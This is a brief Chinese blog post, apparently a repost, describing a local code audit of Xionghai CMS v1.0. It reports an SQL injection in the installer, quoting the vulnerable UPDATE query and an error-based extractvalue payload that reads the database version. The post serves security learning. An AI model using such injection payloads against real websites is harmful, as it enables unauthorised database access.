• 微信公众号:美女很有趣。 工作之余,放松一下,关注即送10G+美女照片!

熊海cms v1.0代码审计

开发技术 开发技术 2周前 (06-08) 9次浏览

下载熊海cms整个文件

phpstudy本地搭建网站完之后 开始进行代码审计

先seay扫描一遍

扫出第一个漏洞

安装界面存在sql注入漏洞

$query = "UPDATE manage SET user='$user',password='$password',name='$user'";

构造报错注入payload

1' or extractvalue(1,concat(0x7e,(select @@version),0x7e));#

熊海cms v1.0代码审计

 


程序员灯塔
转载请注明原文链接:熊海cms v1.0代码审计
喜欢 (0)